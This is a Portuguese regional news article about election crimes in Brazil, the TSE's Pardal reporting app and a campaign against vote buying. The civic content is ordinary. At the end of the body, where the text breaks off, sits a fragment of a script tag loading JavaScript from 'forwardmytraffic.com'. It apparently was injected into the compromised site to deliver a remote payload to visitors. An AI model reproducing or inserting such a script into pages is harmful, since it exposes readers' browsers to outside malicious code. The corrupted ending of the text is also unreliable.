InícioDestaqueELEIÇÕES LIMPAS

ELEIÇÕES LIMPAS

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

A pouco mais de um mês das eleições, as campanhas correm soltas por aí. Vários candidatos disputando o apoio do eleitorado.

 

Para alguns candidatos, eleição é terra de ninguém, vale tudo, só não vale perder. Por isso muitos candidatos acabam cometendo crimes eleitorais, ou por não saberem da legislação, ou por serem inescrupulosos mesmo.

 

Diante da quantidade grande de crimes eleitorais que acontecem em todas as eleições, o Tribunal Superior Eleitoral lançou um aplicativo que permite fazer denúncias. Chama-se PARDAL. Nele há orientações e sobre o que pode e não pode e também um espaço para denunciar, deixando muito mais fácil coibir práticas ilegais.

 

As práticas que em hipótese alguma podem ser feitas são:

 

  • PUBLICIDADE EM BENS PÚBLICOS E DE USO COMUM. Esses bens são postes de iluminação pública, sinalização de tráfego, viadutos, passarelas, pontes, paradas de ônibus e outros equipamentos urbanos, árvores e jardins localizados em áreas públicas, muros, cercas e tapumes divisórios, propaganda de qualquer natureza, inclusive pichação, inscrição a tinta e exposição de placas, estandartes, faixas, cavaletes, bonecos e assemelhados.
  • CAMISETAS, CHAVEIROS, BONÉS, CANETAS, BRINDES E CESTAS BÁSICAS: confecção, utilização, distribuição por comitê, por candidato, ou com a sua autorização, de camisetas, chaveiros, bonés, canetas, brindes, cestas básicas ou quaisquer outros bens ou materiais que possam proporcionar vantagem ao eleitor.
  • OUTDOORS E OUTDOORS ELETRÔNICOS: Outdoors, inclusive eletrônicos e engenhos ou equipamentos publicitários, conjunto de peças propaganda que justapostas se assemelhem ou causem efeito visual de outdoor.
  • TELEMARKETING
  • UTILIZAÇÃO DE ARTEFATOS QUE SE ASSEMELHE À URNA ELETRÔNICA COMO VEÍCULO DE PROPAGANDA ELEITORAL

Existem outras práticas ilegais, mas deixo ao interesse de vocês para baixarem o aplicativo e, caso presenciem esses atos, denunciarem.

 

É possível também denunciar a compra de votos através do aplicativo pardal.

 

A compra de votos é a prática mais prejudicial à democracia, temos que combater isso. O Movimento Cidadão Fiscal está fazendo uma campanha para diminuir essa atividade. A campanha se baseia na divulgação de um banner nas redes sociais, e com isso, conscientizar a população da importância de denunciar…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.